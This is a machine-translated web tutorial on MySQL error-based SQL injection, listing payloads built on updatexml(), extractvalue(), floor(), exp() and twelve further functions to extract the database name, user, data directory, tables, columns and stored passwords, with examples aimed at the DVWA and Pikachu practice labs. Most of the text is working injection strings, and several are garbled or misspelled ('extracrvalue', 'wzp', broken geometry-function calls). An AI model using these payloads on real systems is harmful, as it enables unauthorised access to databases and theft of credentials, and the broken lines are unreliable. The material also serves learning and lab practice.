当前位置:网站首页>SQL injection error report injection function graphic explanation

SQL injection error report injection function graphic explanation

2022-07-07 21:13:00 1024 questions

Catalog

Preface

Commonly used error reporting function

Usage details

updatexml() function

example

extractvalue() function

floor() function

exp() function

12 An error reporting injection function

summary

Preface

The premise of error injection is that when the statement has errors , The error message is output to the front end . The reason for the vulnerability is that developers use print_r (),mysql_error(),mysqli_connect_error() Function will mysql The error information is output to the front end , So you can close the original statement , Execute the following statement .

Commonly used error reporting function

updatexml()         yes mysql Yes xml Document data for query and modification xpath function
extractvalue()       yes mysql Yes xml Document data for query xpath function
floor()             mysql The function used to round in
exp()               This function returns e( The base of natural logarithm ) Index X The power of

Usage details updatexml() function

updatexml() The function is to change ( Find and replace )xml The value of the eligible node in the document

grammar :updatexml(xml_document,XPthstring,new_value)

The first parameter is the string string(XML The name of the document object )

The second parameter is to specify a location in the string (Xpath Format string )

The third parameter is what to replace with ,string Format

Xpath Positioning must be effective , Otherwise, there will be mistakes . We can use this feature to break out the data we want

example

Registration is to add data to the database ,insert.

Type single quotes... At the user Report errors

Guess the back-end statement

insert into user(name,password,sex,phone,address1,address2) value('xxx',123,1,2,3,4)

Can be in xxx Close single quotation marks at , Reveal the data we want

?id=1' or updatexml(0,concat(0x7e,select database()),1)'

Closing single quotation marks makes the statement escape , Then reconstruct the statement query , The name of blasting warehouse is :"pikachu"

The analysis process

When the input payload

?id=1' or updatexml(0,concat(0x7e,select database()),1)or'

The back end will be spliced into

insert into user(name,password,sex,phone,address1,address2) value('' or updatexml(1,concat(0x7e,database()),0) or '',

The table name and column name fields are the same as normal queries, but they have changed their positions

Use process

Library name

1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#

Table name

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

Table lookup information ( Suppose there is a users surface , The library is dvwa

1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #

Check the field value ( Suppose the field name is last_name(dvwa.users It means to call dvwa Library users surface )

1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #extractvalue() function

extractvalue() The function from the target xml Returns the string containing the value of the query

extractvalue (XML_document, XPath_string);

The first parameter :XML_document yes String Format , by XML The name of the document object , In this paper, for doc

The second parameter :XPath_string(Xpath Format string ),Xpath Positioning must be effective , Otherwise, there will be mistakes

structure payload

?id=1' or extracrvalue(0,concat(0x7e,database())) or '

Be careful xpath Echo has only one use limit Functions explode one by one , And the longest is 32 position , exceed 32 The position can't explode

Use process

Current library

1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #

Current table

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #

Table information ( Suppose the table is users

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #

field value ( Field is user_id,first_name,last_name,(dvwa.users It means to call dvwa Library users surface )

1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #floor() function

floor() yes mysql An integral function of

Library name

id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #

Table name ( The library is dvwa, By modifying the limit 0,1 Value increment lookup table , limit 1,1、limit 2,1

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#

Field name ( library :dvwa, surface :users

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#

field value ( field value :user,password(dvwa.users It means to call dvwa library users surface

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#exp() function

When passing a greater than 709 The value of , function exp() It will cause an overflow error .

Library name

id=1' or exp(~(SELECT * from(select database())a)) or '

Table name ( Library name :pikachu

id=1' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or '

Field name ( Table name :users

id=1' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name = 'users')a)) or '

field value ( Field name :password, Table name :users

id=1' or wzp(~(select * from(select password from users limit 0,1)a)) or '12 An error reporting injection function

1、 adopt floor Report errors , The injection statement is as follows :

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2、 adopt extractvalue Report errors , The injection statement is as follows :

and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3、 adopt updatexml Report errors , The injection statement is as follows :

and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4、 adopt exp Report errors , The injection statement is as follows :

and exp(~(select * from (select user () ) a) );

5、 adopt join Report errors , The injection statement is as follows :

select * from(select * from mysql.user ajoin mysql.user b)c;

6、 adopt NAME_CONST Report errors , The injection statement is as follows :

and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c);

7、 adopt GeometryCollection() Report errors , The injection statement is as follows :

and GeometryCollection(()select *from(select user () )a)b );

8、 adopt polygon () Report errors , The injection statement is as follows :

and polygon (()select * from(select user ())a)b );

9、 adopt multipoint () Report errors , The injection statement is as follows :

and multipoint (()select * from(select user() )a)b );

10、 adopt multlinestring () Report errors , The injection statement is as follows :

and multlinestring (()select * from(selectuser () )a)b );

11、 adopt multpolygon () Report errors , The injection statement is as follows :

and multpolygon (()select * from(selectuser () )a)b );

12、 adopt linestring () Report errors , The injection statement is as follows :

and linestring (()select * from(select user() )a)b ); summary

This is about SQL This is the end of the article on injecting the error reporting injection function , More about SQL Please search the previous articles of software development network or continue to browse the relevant articles below for the content of injection error reporting and injection function. I hope you will support software development network more in the future !


原网站

版权声明
本文为[1024 questions]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/188/202207071838135028.html

边栏推荐

猜你喜欢

随机推荐